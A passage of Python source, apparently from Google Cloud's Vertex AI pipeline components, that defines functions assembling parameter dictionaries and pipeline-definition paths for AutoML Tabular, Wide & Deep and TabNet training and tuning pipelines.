encryption_spec_key_name: str = '') -> Tuple[str, Dict[str, Any]]:
"""Get the AutoML Tabular training pipeline that skips evaluation.
Args:
project: The GCP project that runs the pipeline components.
location: The GCP region that runs the pipeline components.
root_dir: The root GCS directory for the pipeline components.
target_column_name: The target column name.
prediction_type: The type of prediction the model is to produce.
"classification" or "regression".
optimization_objective: For binary classification, "maximize-au-roc",
"minimize-log-loss", "maximize-au-prc", "maximize-precision-at-recall", or
"maximize-recall-at-precision". For multi class classification,
"minimize-log-loss". For regression, "minimize-rmse", "minimize-mae", or
"minimize-rmsle".
transformations: The transformations to apply.
split_spec: The split spec.
data_source: The data source.
max_selected_features: number of features to be selected.
train_budget_milli_node_hours: The train budget of creating this model,
expressed in milli node hours i.e. 1,000 value in this field means 1 node
hour.
stage_1_num_parallel_trials: Number of parallel trails for stage 1.
stage_2_num_parallel_trials: Number of parallel trails for stage 2.
stage_2_num_selected_trials: Number of selected trials for stage 2.
weight_column_name: The weight column name.
study_spec_override: The dictionary for overriding study spec. The
dictionary should be of format
https://github.com/googleapis/googleapis/blob/4e836c7c257e3e20b1de14d470993a2b1f4736a8/google/cloud/aiplatform/v1beta1/study.proto#L181.
optimization_objective_recall_value: Required when optimization_objective is
"maximize-precision-at-recall". Must be between 0 and 1, inclusive.
optimization_objective_precision_value: Required when optimization_objective
is "maximize-recall-at-precision". Must be between 0 and 1, inclusive.
stage_1_tuner_worker_pool_specs_override: The dictionary for overriding.
stage 1 tuner worker pool spec. The dictionary should be of format
https://github.com/googleapis/googleapis/blob/4e836c7c257e3e20b1de14d470993a2b1f4736a8/google/cloud/aiplatform/v1beta1/custom_job.proto#L172.
cv_trainer_worker_pool_specs_override: The dictionary for overriding stage
cv trainer worker pool spec. The dictionary should be of format
https://github.com/googleapis/googleapis/blob/4e836c7c257e3e20b1de14d470993a2b1f4736a8/google/cloud/aiplatform/v1beta1/custom_job.proto#L172.
export_additional_model_without_custom_ops: Whether to export additional
model without custom TensorFlow operators.
stats_and_example_gen_dataflow_machine_type: The dataflow machine type for
stats_and_example_gen component.
stats_and_example_gen_dataflow_max_num_workers: The max number of Dataflow
workers for stats_and_example_gen component.
stats_and_example_gen_dataflow_disk_size_gb: Dataflow worker's disk size in
GB for stats_and_example_gen component.
transform_dataflow_machine_type: The dataflow machine type for transform
component.
transform_dataflow_max_num_workers: The max number of Dataflow workers for
transform component.
transform_dataflow_disk_size_gb: Dataflow worker's disk size in GB for
transform component.
dataflow_subnetwork: Dataflow's fully qualified subnetwork name, when empty
the default
subnetwork will be used. Example:
https://cloud.google.com/dataflow/docs/guides/specifying-networks#example_network_and_subnetwork_specifications
dataflow_use_public_ips: Specifies whether Dataflow workers use public IP
addresses.
encryption_spec_key_name: The KMS key name.
Returns:
Tuple of pipeline_definition_path and parameter_values.
"""
_, parameter_values = get_skip_evaluation_pipeline_and_parameters(
project=project,
location=location,
root_dir=root_dir,
target_column_name=target_column_name,
prediction_type=prediction_type,
optimization_objective=optimization_objective,
transformations=transformations,
split_spec=split_spec,
data_source=data_source,
train_budget_milli_node_hours=train_budget_milli_node_hours,
stage_1_num_parallel_trials=stage_1_num_parallel_trials,
stage_2_num_parallel_trials=stage_2_num_parallel_trials,
stage_2_num_selected_trials=stage_2_num_selected_trials,
weight_column_name=weight_column_name,
study_spec_override=study_spec_override,
optimization_objective_recall_value=optimization_objective_recall_value,
optimization_objective_precision_value=optimization_objective_precision_value,
stage_1_tuner_worker_pool_specs_override=stage_1_tuner_worker_pool_specs_override,
cv_trainer_worker_pool_specs_override=cv_trainer_worker_pool_specs_override,
export_additional_model_without_custom_ops=export_additional_model_without_custom_ops,
stats_and_example_gen_dataflow_machine_type=stats_and_example_gen_dataflow_machine_type,
stats_and_example_gen_dataflow_max_num_workers=stats_and_example_gen_dataflow_max_num_workers,
stats_and_example_gen_dataflow_disk_size_gb=stats_and_example_gen_dataflow_disk_size_gb,
transform_dataflow_machine_type=transform_dataflow_machine_type,
transform_dataflow_max_num_workers=transform_dataflow_max_num_workers,
transform_dataflow_disk_size_gb=transform_dataflow_disk_size_gb,
dataflow_use_public_ips=dataflow_use_public_ips,
dataflow_subnetwork=dataflow_subnetwork,
encryption_spec_key_name=encryption_spec_key_name)
parameter_values['max_selected_features'] = max_selected_features
pipeline_definition_path = os.path.join(
pathlib.Path(__file__).parent.resolve(),
'feature_selection_skip_evaluation_pipeline.json')
return pipeline_definition_path, parameter_values
def get_skip_architecture_search_pipeline_and_parameters(
project: str,
location: str,
root_dir: str,
target_column_name: str,
prediction_type: str,
optimization_objective: str,
transformations: Dict[str, Any],
split_spec: Dict[str, Any],
data_source: Dict[str, Any],
train_budget_milli_node_hours: float,
stage_1_tuning_result_artifact_uri: str,
stage_2_num_parallel_trials: int = _DEFAULT_NUM_PARALLEL_TRAILS,
stage_2_num_selected_trials: int = _DEFAULT_STAGE_2_NUM_SELECTED_TRAILS,
weight_column_name: str = '',
optimization_objective_recall_value: float = -1,
optimization_objective_precision_value: float = -1,
cv_trainer_worker_pool_specs_override: Optional[Dict[str, Any]] = None,
export_additional_model_without_custom_ops: bool = False,
stats_and_example_gen_dataflow_machine_type: str = 'n1-standard-16',
stats_and_example_gen_dataflow_max_num_workers: int = 25,
transform_dataflow_machine_type: str = 'n1-standard-16',
transform_dataflow_max_num_workers: int = 25,
dataflow_subnetwork: str = '',
dataflow_use_public_ips: bool = True,
encryption_spec_key_name: str = '') -> Tuple[str, Dict[str, Any]]:
"""Get the AutoML Tabular training pipeline that skips architecture search.
Args:
project: The GCP project that runs the pipeline components.
location: The GCP region that runs the pipeline components.
root_dir: The root GCS directory for the pipeline components.
target_column_name: The target column name.
prediction_type: The type of prediction the model is to produce.
"classification" or "regression".
optimization_objective: For binary classification, "maximize-au-roc",
"minimize-log-loss", "maximize-au-prc", "maximize-precision-at-recall", or
"maximize-recall-at-precision". For multi class classification,
"minimize-log-loss". For regression, "minimize-rmse", "minimize-mae", or
"minimize-rmsle".
transformations: The transformations to apply.
split_spec: The split spec.
data_source: The data source.
train_budget_milli_node_hours: The train budget of creating this model,
expressed in milli node hours i.e. 1,000 value in this field means 1 node
hour.
stage_1_tuning_result_artifact_uri: The stage 1 tuning result artifact GCS
URI.
stage_2_num_parallel_trials: Number of parallel trail for stage 2.
stage_2_num_selected_trials: Number of selected trials for stage 2.
weight_column_name: The weight column name.
optimization_objective_recall_value: Required when optimization_objective is
"maximize-precision-at-recall". Must be between 0 and 1, inclusive.
optimization_objective_precision_value: Required when optimization_objective
is "maximize-recall-at-precision". Must be between 0 and 1, inclusive.
cv_trainer_worker_pool_specs_override: The dictionary for overriding stage
cv trainer worker pool spec. The dictionary should be of format
https://github.com/googleapis/googleapis/blob/4e836c7c257e3e20b1de14d470993a2b1f4736a8/google/cloud/aiplatform/v1beta1/custom_job.proto#L172.
export_additional_model_without_custom_ops: Whether to export additional
model without custom TensorFlow operators.
stats_and_example_gen_dataflow_machine_type: The dataflow machine type for
stats_and_example_gen component.
stats_and_example_gen_dataflow_max_num_workers: The max number of Dataflow
workers for stats_and_example_gen component.
transform_dataflow_machine_type: The dataflow machine type for transform
component.
transform_dataflow_max_num_workers: The max number of Dataflow workers for
transform component.
dataflow_subnetwork: Dataflow's fully qualified subnetwork name, when empty
the default
subnetwork will be used. Example:
https://cloud.google.com/dataflow/docs/guides/specifying-networks#example_network_and_subnetwork_specifications
dataflow_use_public_ips: Specifies whether Dataflow workers use public IP
addresses.
encryption_spec_key_name: The KMS key name.
Returns:
Tuple of pipeline_definiton_path and parameter_values.
"""
if stage_2_num_parallel_trials <= 0:
stage_2_num_parallel_trials = _DEFAULT_NUM_PARALLEL_TRAILS
stage_2_deadline_hours = train_budget_milli_node_hours / 1000.0
stage_2_single_run_max_secs = int(stage_2_deadline_hours * 3600.0 / 1.3)
parameter_values = {
'project':
project,
'location':
location,
'root_dir':
root_dir,
'target_column_name':
target_column_name,
'prediction_type':
prediction_type,
'optimization_objective':
optimization_objective,
'transformations':
input_dictionary_to_parameter(transformations),
'split_spec':
input_dictionary_to_parameter(split_spec),
'data_source':
input_dictionary_to_parameter(data_source),
'stage_1_tuning_result_artifact_uri':
stage_1_tuning_result_artifact_uri,
'stage_2_deadline_hours':
stage_2_deadline_hours,
'stage_2_num_parallel_trials':
stage_2_num_parallel_trials,
'stage_2_num_selected_trials':
stage_2_num_selected_trials,
'stage_2_single_run_max_secs':
stage_2_single_run_max_secs,
'weight_column_name':
weight_column_name,
'optimization_objective_recall_value':
optimization_objective_recall_value,
'optimization_objective_precision_value':
optimization_objective_precision_value,
'cv_trainer_worker_pool_specs_override':
input_dictionary_to_parameter(cv_trainer_worker_pool_specs_override),
'export_additional_model_without_custom_ops':
export_additional_model_without_custom_ops,
'stats_and_example_gen_dataflow_machine_type':
stats_and_example_gen_dataflow_machine_type,
'stats_and_example_gen_dataflow_max_num_workers':
stats_and_example_gen_dataflow_max_num_workers,
'transform_dataflow_machine_type':
transform_dataflow_machine_type,
'transform_dataflow_max_num_workers':
transform_dataflow_max_num_workers,
'dataflow_subnetwork':
dataflow_subnetwork,
'dataflow_use_public_ips':
dataflow_use_public_ips,
'encryption_spec_key_name':
encryption_spec_key_name,
}
pipeline_definition_path = os.path.join(
pathlib.Path(__file__).parent.resolve(),
'skip_architecture_search_pipeline.json')
return pipeline_definition_path, parameter_values
def get_distill_skip_evaluation_pipeline_and_parameters(
*args,
distill_batch_predict_machine_type: str = 'n1-standard-16',
distill_batch_predict_starting_replica_count: int = 25,
distill_batch_predict_max_replica_count: int = 25,
**kwargs) -> Tuple[str, Dict[str, Any]]:
"""Get the AutoML Tabular training pipeline that distill and skips evaluation.
Args:
*args: All arguments in `get_skip_evaluation_pipeline_and_parameters`.
distill_batch_predict_machine_type: The prediction server machine type for
batch predict component in the model distillation.
distill_batch_predict_starting_replica_count: The initial number of
prediction server for batch predict component in the model distillation.
distill_batch_predict_max_replica_count: The max number of prediction server
for batch predict component in the model distillation.
**kwargs: All arguments in `get_skip_evaluation_pipeline_and_parameters`.
Returns:
Tuple of pipeline_definiton_path and parameter_values.
"""
_, parameter_values = get_skip_evaluation_pipeline_and_parameters(
*args, **kwargs)
# All of magic number "1.3" above is because the trial doesn't always finish
# in time_per_trial. 1.3 is an empirical safety margin here.
distill_stage_1_deadline_hours = math.ceil(
float(_DISTILL_TOTAL_TRIALS) /
parameter_values['stage_1_num_parallel_trials']
) * parameter_values['stage_1_single_run_max_secs'] * 1.3 / 3600.0
parameter_values.update({
'distill_stage_1_deadline_hours':
distill_stage_1_deadline_hours,
'distill_batch_predict_machine_type':
distill_batch_predict_machine_type,
'distill_batch_predict_starting_replica_count':
distill_batch_predict_starting_replica_count,
'distill_batch_predict_max_replica_count':
distill_batch_predict_max_replica_count,
})
pipeline_definiton_path = os.path.join(
pathlib.Path(__file__).parent.resolve(),
'distill_skip_evaluation_pipeline.json')
return pipeline_definiton_path, parameter_values
def get_wide_and_deep_trainer_pipeline_and_parameters(
project: str,
location: str,
root_dir: str,
target_column: str,
prediction_type: str,
transformations: Dict[str, Any],
split_spec: Dict[str, Any],
data_source: Dict[str, Any],
learning_rate: float,
dnn_learning_rate: float,
optimizer_type: str = 'adam',
max_steps: int = -1,
max_train_secs: int = -1,
l1_regularization_strength: float = 0,
l2_regularization_strength: float = 0,
l2_shrinkage_regularization_strength: float = 0,
beta_1: float = 0.9,
beta_2: float = 0.999,
hidden_units: str = '30,30,30',
use_wide: bool = True,
embed_categories: bool = True,
dnn_dropout: float = 0,
dnn_optimizer_type: str = 'ftrl',
dnn_l1_regularization_strength: float = 0,
dnn_l2_regularization_strength: float = 0,
dnn_l2_shrinkage_regularization_strength: float = 0,
dnn_beta_1: float = 0.9,
dnn_beta_2: float = 0.999,
enable_profiler: bool = False,
seed: int = 1,
eval_steps: int = 0,
batch_size: int = 100,
eval_frequency_secs: int = 600,
weight_column: str = '',
stats_and_example_gen_dataflow_machine_type: str = 'n1-standard-16',
stats_and_example_gen_dataflow_max_num_workers: int = 25,
stats_and_example_gen_dataflow_disk_size_gb: int = 40,
transform_dataflow_machine_type: str = 'n1-standard-16',
transform_dataflow_max_num_workers: int = 25,
transform_dataflow_disk_size_gb: int = 40,
training_machine_spec: Optional[Dict[str, Any]] = None,
training_replica_count: int = 1,
dataflow_subnetwork: str = '',
dataflow_use_public_ips: bool = True,
encryption_spec_key_name: str = '') -> Tuple[str, Dict[str, Any]]:
"""Get the Wide & Deep training pipeline.
Args:
project: The GCP project that runs the pipeline components.
location: The GCP region that runs the pipeline components.
root_dir: The root GCS directory for the pipeline components.
target_column: The target column name.
prediction_type: The type of prediction the model is to produce.
'classification' or 'regression'.
transformations: The transformations to apply.
split_spec: The split spec.
data_source: The data source.
learning_rate: The learning rate used by the linear optimizer.
dnn_learning_rate: The learning rate for training the deep part of the
model.
optimizer_type: The type of optimizer to use. Choices are "adam", "ftrl" and
"sgd" for the Adam, FTRL, and Gradient Descent Optimizers, respectively.
max_steps: Number of steps to run the trainer for.
max_train_secs: Amount of time in seconds to run the trainer for.
l1_regularization_strength: L1 regularization strength for
optimizer_type="ftrl".
l2_regularization_strength: L2 regularization strength for
optimizer_type="ftrl".
l2_shrinkage_regularization_strength: L2 shrinkage regularization strength
for optimizer_type="ftrl".
beta_1: Beta 1 value for optimizer_type="adam".
beta_2: Beta 2 value for optimizer_type="adam".
hidden_units: Hidden layer sizes to use for DNN feature columns, provided in
comma-separated layers.
use_wide: If set to true, the categorical columns will be used in the wide
part of the DNN model.
embed_categories: If set to true, the categorical columns will be used
embedded and used in the deep part of the model. Embedding size is the
square root of the column cardinality.
dnn_dropout: The probability we will drop out a given coordinate.
dnn_optimizer_type: The type of optimizer to use for the deep part of the
model. Choices are "adam", "ftrl" and "sgd". for the Adam, FTRL, and
Gradient Descent Optimizers, respectively.
dnn_l1_regularization_strength: L1 regularization strength for
dnn_optimizer_type="ftrl".
dnn_l2_regularization_strength: L2 regularization strength for
dnn_optimizer_type="ftrl".
dnn_l2_shrinkage_regularization_strength: L2 shrinkage regularization
strength for dnn_optimizer_type="ftrl".
dnn_beta_1: Beta 1 value for dnn_optimizer_type="adam".
dnn_beta_2: Beta 2 value for dnn_optimizer_type="adam".
enable_profiler: Enables profiling and saves a trace during evaluation.
seed: Seed to be used for this run.
eval_steps: Number of steps to run evaluation for. If not specified or
negative, it means run evaluation on the whole validation dataset. If set
to 0, it means run evaluation for a fixed number of samples.
batch_size: Batch size for training.
eval_frequency_secs: Frequency at which evaluation and checkpointing will
take place.
weight_column: The weight column name.
stats_and_example_gen_dataflow_machine_type: The dataflow machine type for
stats_and_example_gen component.
stats_and_example_gen_dataflow_max_num_workers: The max number of Dataflow
workers for stats_and_example_gen component.
stats_and_example_gen_dataflow_disk_size_gb: Dataflow worker's disk size in
GB for stats_and_example_gen component.
transform_dataflow_machine_type: The dataflow machine type for transform
component.
transform_dataflow_max_num_workers: The max number of Dataflow workers for
transform component.
transform_dataflow_disk_size_gb: Dataflow worker's disk size in GB for
transform component.
training_machine_spec: The machine spec for trainer component. See
https://cloud.google.com/compute/docs/machine-types for options.
training_replica_count: The replica count for the trainer component.
dataflow_subnetwork: Dataflow's fully qualified subnetwork name, when empty
the default
subnetwork will be used. Example:
https://cloud.google.com/dataflow/docs/guides/specifying-networks#example_network_and_subnetwork_specifications
dataflow_use_public_ips: Specifies whether Dataflow workers use public IP
addresses.
encryption_spec_key_name: The KMS key name.
Returns:
Tuple of pipeline_definiton_path and parameter_values.
"""
if not training_machine_spec:
training_machine_spec = {'machine_type': 'n1-standard-16'}
parameter_values = {
'project':
project,
'location':
location,
'root_dir':
root_dir,
'target_column':
target_column,
'prediction_type':
prediction_type,
'transformations':
input_dictionary_to_parameter(transformations),
'split_spec':
input_dictionary_to_parameter(split_spec),
'data_source':
input_dictionary_to_parameter(data_source),
'learning_rate':
learning_rate,
'dnn_learning_rate':
dnn_learning_rate,
'optimizer_type':
optimizer_type,
'max_steps':
max_steps,
'max_train_secs':
max_train_secs,
'l1_regularization_strength':
l1_regularization_strength,
'l2_regularization_strength':
l2_regularization_strength,
'l2_shrinkage_regularization_strength':
l2_shrinkage_regularization_strength,
'beta_1':
beta_1,
'beta_2':
beta_2,
'hidden_units':
hidden_units,
'use_wide':
use_wide,
'embed_categories':
embed_categories,
'dnn_dropout':
dnn_dropout,
'dnn_optimizer_type':
dnn_optimizer_type,
'dnn_l1_regularization_strength':
dnn_l1_regularization_strength,
'dnn_l2_regularization_strength':
dnn_l2_regularization_strength,
'dnn_l2_shrinkage_regularization_strength':
dnn_l2_shrinkage_regularization_strength,
'dnn_beta_1':
dnn_beta_1,
'dnn_beta_2':
dnn_beta_2,
'enable_profiler':
enable_profiler,
'seed':
seed,
'eval_steps':
eval_steps,
'batch_size':
batch_size,
'eval_frequency_secs':
eval_frequency_secs,
'weight_column':
weight_column,
'stats_and_example_gen_dataflow_machine_type':
stats_and_example_gen_dataflow_machine_type,
'stats_and_example_gen_dataflow_max_num_workers':
stats_and_example_gen_dataflow_max_num_workers,
'stats_and_example_gen_dataflow_disk_size_gb':
stats_and_example_gen_dataflow_disk_size_gb,
'transform_dataflow_machine_type':
transform_dataflow_machine_type,
'transform_dataflow_max_num_workers':
transform_dataflow_max_num_workers,
'transform_dataflow_disk_size_gb':
transform_dataflow_disk_size_gb,
'training_machine_spec':
training_machine_spec,
'training_replica_count':
training_replica_count,
'dataflow_subnetwork':
dataflow_subnetwork,
'dataflow_use_public_ips':
dataflow_use_public_ips,
'encryption_spec_key_name':
encryption_spec_key_name,
}
pipeline_definition_path = os.path.join(
pathlib.Path(__file__).parent.resolve(),
'wide_and_deep_trainer_pipeline.json')
return pipeline_definition_path, parameter_values
def get_builtin_algorithm_hyperparameter_tuning_job_pipeline_and_parameters(
project: str,
location: str,
root_dir: str,
target_column: str,
prediction_type: str,
transformations: Dict[str, Any],
split_spec: Dict[str, Any],
data_source: Dict[str, Any],
study_spec_metrics: List[Dict[str, Any]],
study_spec_parameters: List[Dict[str, Any]],
max_trial_count: int,
parallel_trial_count: int,
algorithm: str,
enable_profiler: bool = False,
seed: int = 1,
eval_steps: int = 0,
eval_frequency_secs: int = 600,
weight_column: str = '',
max_failed_trial_count: int = 0,
study_spec_algorithm: str = 'ALGORITHM_UNSPECIFIED',
study_spec_measurement_selection_type: str = 'BEST_MEASUREMENT',
stats_and_example_gen_dataflow_machine_type: str = 'n1-standard-16',
stats_and_example_gen_dataflow_max_num_workers: int = 25,
stats_and_example_gen_dataflow_disk_size_gb: int = 40,
transform_dataflow_machine_type: str = 'n1-standard-16',
transform_dataflow_max_num_workers: int = 25,
transform_dataflow_disk_size_gb: int = 40,
training_machine_spec: Optional[Dict[str, Any]] = None,
training_replica_count: int = 1,
dataflow_subnetwork: str = '',
dataflow_use_public_ips: bool = True,
encryption_spec_key_name: str = '') -> Tuple[str, Dict[str, Any]]:
"""Get the built-in algorithm HyperparameterTuningJob pipeline.
Args:
project: The GCP project that runs the pipeline components.
location: The GCP region that runs the pipeline components.
root_dir: The root GCS directory for the pipeline components.
target_column: The target column name.
prediction_type: The type of prediction the model is to produce.
"classification" or "regression".
transformations: The transformations to apply.
split_spec: The split spec.
data_source: The data source.
study_spec_metrics: List of dictionaries representing metrics to optimize.
The dictionary contains the metric_id, which is reported by the training
job, ands the optimization goal of the metric. One of "minimize" or
"maximize".
study_spec_parameters: List of dictionaries representing parameters to
optimize. The dictionary key is the parameter_id, which is passed to
training job as a command line argument, and the dictionary value is the
parameter specification of the metric.
max_trial_count: The desired total number of trials.
parallel_trial_count: The desired number of trials to run in parallel.
algorithm: Algorithm to train. One of "tabnet" and "wide_and_deep".
enable_profiler: Enables profiling and saves a trace during evaluation.
seed: Seed to be used for this run.
eval_steps: Number of steps to run evaluation for. If not specified or
negative, it means run evaluation on the whole validation dataset. If set
to 0, it means run evaluation for a fixed number of samples.
eval_frequency_secs: Frequency at which evaluation and checkpointing will
take place.
weight_column: The weight column name.
max_failed_trial_count: The number of failed trials that need to be seen
before failing the HyperparameterTuningJob. If set to 0, Vertex AI decides
how many trials must fail before the whole job fails.
study_spec_algorithm: The search algorithm specified for the study. One of
"ALGORITHM_UNSPECIFIED", "GRID_SEARCH", or "RANDOM_SEARCH".
study_spec_measurement_selection_type: Which measurement to use if/when the
service automatically selects the final measurement from previously
reported intermediate measurements. One of "BEST_MEASUREMENT" or
"LAST_MEASUREMENT".
stats_and_example_gen_dataflow_machine_type: The dataflow machine type for
stats_and_example_gen component.
stats_and_example_gen_dataflow_max_num_workers: The max number of Dataflow
workers for stats_and_example_gen component.
stats_and_example_gen_dataflow_disk_size_gb: Dataflow worker's disk size in
GB for stats_and_example_gen component.
transform_dataflow_machine_type: The dataflow machine type for transform
component.
transform_dataflow_max_num_workers: The max number of Dataflow workers for
transform component.
transform_dataflow_disk_size_gb: Dataflow worker's disk size in GB for
transform component.
training_machine_spec: The machine spec for trainer component. See
https://cloud.google.com/compute/docs/machine-types for options.
training_replica_count: The replica count for the trainer component.
dataflow_subnetwork: Dataflow's fully qualified subnetwork name, when empty
the default
subnetwork will be used. Example:
https://cloud.google.com/dataflow/docs/guides/specifying-networks#example_network_and_subnetwork_specifications
dataflow_use_public_ips: Specifies whether Dataflow workers use public IP
addresses.
encryption_spec_key_name: The KMS key name.
Returns:
Tuple of pipeline_definiton_path and parameter_values.
"""
if not training_machine_spec:
training_machine_spec = {'machine_type': 'n1-standard-16'}
if algorithm not in ['tabnet', 'wide_and_deep']:
raise ValueError(
'Invalid algorithm provided. Supported values are "tabnet" and "wide_and_deep".'
)
parameter_values = {
'project':
project,
'location':
location,
'root_dir':
root_dir,
'target_column':
target_column,
'prediction_type':
prediction_type,
'transformations':
input_dictionary_to_parameter(transformations),
'split_spec':
input_dictionary_to_parameter(split_spec),
'data_source':
input_dictionary_to_parameter(data_source),
'study_spec_metrics':
study_spec_metrics,
'study_spec_parameters':
study_spec_parameters,
'max_trial_count':
max_trial_count,
'parallel_trial_count':
parallel_trial_count,
'enable_profiler':
enable_profiler,
'seed':
seed,
'eval_steps':
eval_steps,
'eval_frequency_secs':
eval_frequency_secs,
'weight_column':
weight_column,
'max_failed_trial_count':
max_failed_trial_count,
'study_spec_algorithm':
study_spec_algorithm,
'study_spec_measurement_selection_type':
study_spec_measurement_selection_type,
'stats_and_example_gen_dataflow_machine_type':
stats_and_example_gen_dataflow_machine_type,
'stats_and_example_gen_dataflow_max_num_workers':
stats_and_example_gen_dataflow_max_num_workers,
'stats_and_example_gen_dataflow_disk_size_gb':
stats_and_example_gen_dataflow_disk_size_gb,
'transform_dataflow_machine_type':
transform_dataflow_machine_type,
'transform_dataflow_max_num_workers':
transform_dataflow_max_num_workers,
'transform_dataflow_disk_size_gb':
transform_dataflow_disk_size_gb,
'training_machine_spec':
training_machine_spec,
'training_replica_count':
training_replica_count,
'dataflow_subnetwork':
dataflow_subnetwork,
'dataflow_use_public_ips':
dataflow_use_public_ips,
'encryption_spec_key_name':
encryption_spec_key_name,
}
if algorithm == 'tabnet':
parameter_values['tabnet'] = True
pipeline_definition_path = os.path.join(
pathlib.Path(__file__).parent.resolve(),
'tabnet_hyperparameter_tuning_job_pipeline.json')
if algorithm == 'wide_and_deep':
parameter_values['wide_and_deep'] = True
pipeline_definition_path = os.path.join(
pathlib.Path(__file__).parent.resolve(),
'wide_and_deep_hyperparameter_tuning_job_pipeline.json')
return pipeline_definition_path, parameter_values
def get_tabnet_trainer_pipeline_and_parameters(
project: str,
location: str,
root_dir: str,
target_column: str,
prediction_type: str,
transformations: Dict[str, Any],
split_spec: Dict[str, Any],
data_source: Dict[str, Any],
learning_rate: float,
max_steps: int = -1,
max_train_secs: int = -1,
large_category_dim: int = 1,
large_category_thresh: int = 300,
yeo_johnson_transform: bool = True,
feature_dim: int = 64,
feature_dim_ratio: float = 0.5,
num_decision_steps: int = 6,
relaxation_factor: float = 1.5,
decay_every: float = 100,
gradient_thresh: float = 2000,
sparsity_loss_weight: float = 0.00001,
batch_momentum: float = 0.95,
batch_size_ratio: float = 0.25,
num_transformer_layers: int = 4,
num_transformer_layers_ratio: float = 0.25,
class_weight: float = 1.0,
loss_function_type: str = 'default',
alpha_focal_loss: float = 0.25,
gamma_focal_loss: float = 2.0,
enable_profiler: bool = False,
seed: int = 1,
eval_steps: int = 0,
batch_size: int = 100,
eval_frequency_secs: int = 600,
weight_column: str = '',
stats_and_example_gen_dataflow_machine_type: str = 'n1-standard-16',
stats_and_example_gen_dataflow_max_num_workers: int = 25,
stats_and_example_gen_dataflow_disk_size_gb: int = 40,
transform_dataflow_machine_type: str = 'n1-standard-16',
transform_dataflow_max_num_workers: int = 25,
transform_dataflow_disk_size_gb: int = 40,
training_machine_spec: Optional[Dict[str, Any]] = None,
training_replica_count: int = 1,
dataflow_subnetwork: str = '',
dataflow_use_public_ips: bool = True,
encryption_spec_key_name: str = '') -> Tuple[str, Dict[str, Any]]:
"""Get the TabNet training pipeline.
Args:
project: The GCP project that runs the pipeline components.
location: The GCP region that runs the pipeline components.
root_dir: The root GCS directory for the pipeline components.
target_column: The target column name.
prediction_type: The type of prediction the model is to produce.
"classification" or "regression".
transformations: The transformations to apply.
split_spec: The split spec.
data_source: The data source.
learning_rate: The learning rate used by the linear optimizer.
max_steps: Number of steps to run the trainer for.
max_train_secs: Amount of time in seconds to run the trainer for.
large_category_dim: Embedding dimension for categorical feature with large
number of categories.
large_category_thresh: Threshold for number of categories to apply
large_category_dim embedding dimension to.
yeo_johnson_transform: Enables trainable Yeo-Johnson power transform.
feature_dim: Dimensionality of the hidden representation in feature
transformation block.
feature_dim_ratio: The ratio of output dimension (dimensionality of the
outputs of each decision step) to feature dimension.
num_decision_steps: Number of sequential decision steps.
relaxation_factor: Relaxation factor that promotes the reuse of each feature
at different decision steps. When it is 1, a feature is enforced to be
used only at one decision step and as it increases, more flexibility is
provided to use a feature at multiple decision steps.
decay_every: Number of iterations for periodically applying learning rate
decaying.
gradient_thresh: Threshold for the norm of gradients for clipping.
sparsity_loss_weight: Weight of the loss for sparsity regularization
(increasing it will yield more sparse feature selection).
batch_momentum: Momentum in ghost batch normalization.
batch_size_ratio: The ratio of virtual batch size (size of the ghost batch
normalization) to batch size.
num_transformer_layers: The number of transformer layers for each decision
step. used only at one decision step and as it increases, more flexibility
is provided to use a feature at multiple decision steps.
num_transformer_layers_ratio: The ratio of shared transformer layer to
transformer layers.
class_weight: The class weight is used to computes a weighted cross entropy
which is helpful in classify imbalanced dataset. Only used for
classification.
loss_function_type: Loss function type. Loss function in classification
[cross_entropy, weighted_cross_entropy, focal_loss], default is
cross_entropy.
Loss function in regression: [rmse, mae, mse], default is mse.
alpha_focal_loss: Alpha value (balancing factor) in focal_loss function.
Only used for classification.
gamma_focal_loss: Gamma value (modulating factor) for focal loss for focal
loss. Only used for classification.
enable_profiler: Enables profiling and saves a trace during evaluation.
seed: Seed to be used for this run.
eval_steps: Number of steps to run evaluation for. If not specified or
negative, it means run evaluation on the whole validation dataset. If set
to 0, it means run evaluation for a fixed number of samples.
batch_size: Batch size for training.
eval_frequency_secs: Frequency at which evaluation and checkpointing will
take place.
weight_column: The weight column name.
stats_and_example_gen_dataflow_machine_type: The dataflow machine type for
stats_and_example_gen component.
stats_and_example_gen_dataflow_max_num_workers: The max number of Dataflow
workers for stats_and_example_gen component.
stats_and_example_gen_dataflow_disk_size_gb: Dataflow worker's disk size in
GB for stats_and_example_gen component.
transform_dataflow_machine_type: The dataflow machine type for transform
component.
transform_dataflow_max_num_workers: The max number of Dataflow workers for
transform component.
transform_dataflow_disk_size_gb: Dataflow worker's disk size in GB for
transform component.
training_machine_spec: The machine spec for trainer component. See
https://cloud.google.com/compute/docs/machine-types for options.
training_replica_count: The replica count for the trainer component.
dataflow_subnetwork: Dataflow's fully qualified subnetwork name, when empty
the default
subnetwork will be used. Example:
https://cloud.google.com/dataflow/docs/guides/specifying-networks#example_network_and_subnetwork_specifications
dataflow_use_public_ips: Specifies whether Dataflow workers use public IP
addresses.
encryption_spec_key_name: The KMS key name.
Returns:
Tuple of pipeline_definiton_path and parameter_values.
"""
if not training_machine_spec:
training_machine_spec = {'machine_type': 'n1-standard-16'}
parameter_values = {
'project':
project,
'location':
location,
'root_dir':
root_dir,
'target_column':
target_column,
'prediction_type':
prediction_type,
'transformations':
input_dictionary_to_parameter(transformations),
'split_spec':
input_dictionary_to_parameter(split_spec),
'data_source':
input_dictionary_to_parameter(data_source),
'learning_rate':
learning_rate,
'max_steps':
max_steps,
'max_train_secs':
max_train_secs,
'large_category_dim':
large_category_dim,
'large_category_thresh':
large_category_thresh,
'yeo_johnson_transform':
yeo_johnson_transform,
'feature_dim':
feature_dim,
'feature_dim_ratio':
feature_dim_ratio,
'num_decision_steps':
num_decision_steps,
'relaxation_factor':
relaxation_factor,
'decay_every':
decay_every,
'gradient_thresh':
gradient_thresh,
'sparsity_loss_weight':
sparsity_loss_weight,
'batch_momentum':
batch_momentum,
'batch_size_ratio':
batch_size_ratio,
'num_transformer_layers':
num_transformer_layers,
'num_transformer_layers_ratio':
num_transformer_layers_ratio,
'class_weight':
class_weight,
'loss_function_type':
loss_function_type,
'alpha_focal_loss':
alpha_focal_loss,
'gamma_focal_loss':
gamma_focal_loss,
'enable_profiler':
enable_profiler,
'seed':
seed,
'eval_steps':
eval_steps,
'batch_size':
batch_size,
'eval_frequency_secs':
eval_frequency_secs,
'weight_column':
weight_column,
'stats_and_example_gen_dataflow_machine_type':
stats_and_example_gen_dataflow_machine_type,
'stats_and_example_gen_dataflow_max_num_workers':
stats_and_example_gen_dataflow_max_num_workers,
'stats_and_example_gen_dataflow_disk_size_gb':
stats_and_example_gen_dataflow_disk_size_gb,
